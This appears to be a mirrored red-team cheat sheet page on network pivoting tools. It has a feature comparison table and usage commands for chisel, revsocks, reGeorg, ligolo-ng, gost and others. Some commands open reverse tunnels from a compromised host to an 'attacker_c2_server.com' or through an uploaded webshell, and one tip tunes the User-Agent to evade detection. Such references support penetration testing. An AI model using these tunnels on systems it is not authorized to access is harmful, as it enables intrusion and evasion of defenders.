daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

network-pivoting-tools.md (5841B)


      1 ---
      2 title: "Network Pivoting Tools"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/pivoting/network-pivoting-tools.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/pivoting/network-pivoting-tools.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Network Pivoting Tools
     12 
     13 ## Tools Comparison
     14 
     15 Comparison table showing platform support (Windows, Linux, macOS), available polling methods (HTTPS, WebSockets), and supported SOCKS versions (4/5).
     16 
     17 | Name       | SOCKS4 | SOCKS5 | SOCKET | HTTPS | Web Socket | Windows | Linux | MacOS | Tun Interface |
     18 | ---------- | ------ | ------ | ------ | ----- | ---------- | ------- | ----- | ----- | ------------- |
     19 | SSH        | ✅     | ✅     | ✅     | ❌    | ❌         | ✅      | ✅    | ✅    | ❌            |
     20 | reGeorg    | ✅     | ❌     | ✅     | ❌    | ❌         | ✅      | ✅    | ✅    | ❌            |
     21 | pivotnacci | ✅     | ✅     | ❌     | ✅    | ❌         | ✅      | ✅    | ✅    | ❌            |
     22 | wstunnel   | ✅     | ✅     | ❌     | ✅    | ✅         | ✅      | ✅    | ✅    | ❌            |
     23 | chisel     | ❌     | ✅     | ❌     | ✅    | ✅         | ✅      | ✅    | ✅    | ❌            |
     24 | revsocks   | ❌     | ✅     | ✅     | ✅    | ✅         | ✅      | ✅    | ✅    | ❌            |
     25 | ligolo-ng  | ❌     | ❌     | ✅     | ❌    | ✅         | ✅      | ✅    | ✅    | ✅            |
     26 | gost       | ✅     | ✅     | ✅     | ❌    | ❌         | ✅      | ✅    | ✅    | ✅            |
     27 | rpivot     | ✅     | ❌     | ✅     | ❌    | ❌         | ✅      | ✅    | ✅    | ❌            |
     28 
     29 ## Tools
     30 
     31 ### wstunnel
     32 
     33 * [erebe/wstunnel](https://github.com/erebe/wstunnel) - Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available
     34 
     35 ```ps1
     36 wstunnel server wss://[::]:8080
     37 wstunnel client -L socks5://127.0.0.1:8888 --connection-min-idle 5 wss://myRemoteHost:8080
     38 curl -x socks5h://127.0.0.1:8888 http://google.com/
     39 ```
     40 
     41 ### chisel
     42 
     43 * [jpillora/chisel](https://github.com/jpillora/chisel) - A fast TCP/UDP tunnel over HTTP
     44 
     45 ```powershell
     46 chisel server -p 8008 --reverse
     47 chisel.exe client YOUR_IP:8008 R:socks
     48 ```
     49 
     50 ### revsocks
     51 
     52 * [kost/revsocks](https://github.com/kost/revsocks) - Reverse SOCKS5 implementation in Go
     53 
     54 Reverse SOCKS using websocket
     55 
     56 ```ps1
     57 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword -tls -ws
     58 revsocks -connect https://clientIP:8443 -pass SuperSecretPassword -ws
     59 ```
     60 
     61 Reverse SOCKS using TLS encryption
     62 
     63 ```ps1
     64 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword
     65 revsocks -connect clientIP:8443 -pass SuperSecretPassword
     66 ```
     67 
     68 Reverse SOCKS using TCP
     69 
     70 ```ps1
     71 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword -tls
     72 revsocks -connect clientIP:8443 -pass SuperSecretPassword -tls
     73 ```
     74 
     75 * Set a strong password on the connection: `-pass Password1234`
     76 * Use an authenticated proxy: `-proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass`
     77 * Define a User-Agent to reduce detections: `-useragent "Mozilla 5.0/IE Windows 10"`
     78 
     79 ### ssh
     80 
     81 ```bash
     82 ssh -N -f -D [listenport] [user]@[host]
     83 ```
     84 
     85 ### reGeorg
     86 
     87 * [sensepost/reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
     88 
     89 ```python
     90 python reGeorgSocksProxy.py --listen-port 8080 --url http://compromised.host/shell.jsp
     91 ```
     92 
     93 * **Step 1**. Upload tunnel.(`aspx|ashx|jsp|php`) to a webserver.
     94 * **Step 2**. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py
     95 
     96 ### pivotnacci
     97 
     98 * [blackarrowsec/pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents.
     99 
    100 ```powershell
    101 pip3 install pivotnacci
    102 usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message]
    103                   [--password password] [--user-agent user_agent]
    104                   [--header header] [--proxy [protocol://]host[:port]]
    105                   [--type type] [--polling-interval milliseconds]
    106                   [--request-tries number] [--retry-interval milliseconds]
    107                   url
    108 
    109 pivotnacci  https://domain.com/agent.php --password "s3cr3t" --polling-interval 2000
    110 ```
    111 
    112 ### ligolo
    113 
    114 Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
    115 
    116 * [nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) - An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
    117 * [sysdream/ligolo](https://github.com/sysdream/ligolo) - Reverse Tunneling made easy for pentesters.
    118 
    119 ```ps1
    120 ./proxy -h # Help options
    121 ./proxy -autocert # Automatically request LetsEncrypt certificates
    122 ./proxy -selfcert # Use self-signed certificates
    123 ./agent -connect attacker_c2_server.com:11601
    124 
    125 ligolo-ng » session 
    126 ? Specify a session : 1
    127 
    128 interface_create --name ligolo
    129 route_add --name ligolo --route 10.24.0.0/24
    130 tunnel_start --tun ligolo
    131 ```
    132 
    133 ### gost
    134 
    135 * [ginuerzh/gost](https://github.com/ginuerzh/gost) - GO Simple Tunnel - a simple tunnel written in golang
    136 
    137 ```ps1
    138 gost -L=socks5://:1080 # server
    139 gost -L=:8080 -F=socks5://server_ip:1080?notls=true # client
    140 ```
    141 
    142 ### sshuttle
    143 
    144 * [sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) - Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
    145 
    146 ```ps1
    147 sshuttle -vvr user@10.10.10.10 10.1.1.0/24
    148 sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 
    149 ```
    150 
    151 ## References
    152 
    153 * [GO Simple Tunnel - Documentation](https://gost.run/en/)
    154 * [Ligolo-ng - Documentation](https://docs.ligolo.ng/)
    155 * [sshutle - Documentation](https://sshuttle.readthedocs.io/en/stable/usage.html)